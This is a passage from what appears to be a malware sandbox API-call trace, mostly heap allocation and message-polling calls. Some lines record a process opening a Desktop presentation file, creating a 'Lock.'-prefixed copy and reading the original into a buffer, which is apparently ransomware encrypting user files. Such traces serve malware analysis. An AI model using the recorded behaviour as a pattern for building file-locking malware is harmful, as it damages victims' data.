hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPqP3gN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opqp3gn.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0188.556] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.556] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0188.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.OPqP3gN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.opqp3gn.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0188.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.558] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.559] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0188.561] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x72a0, lpOverlapped=0x0) returned 1 [0188.561] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x172a0) returned 0x24d7a58 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0188.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0188.567] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x172a0) returned 0x24d7a58 [0188.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x172a0) returned 0x34c94f8 [0188.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.572] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.574] 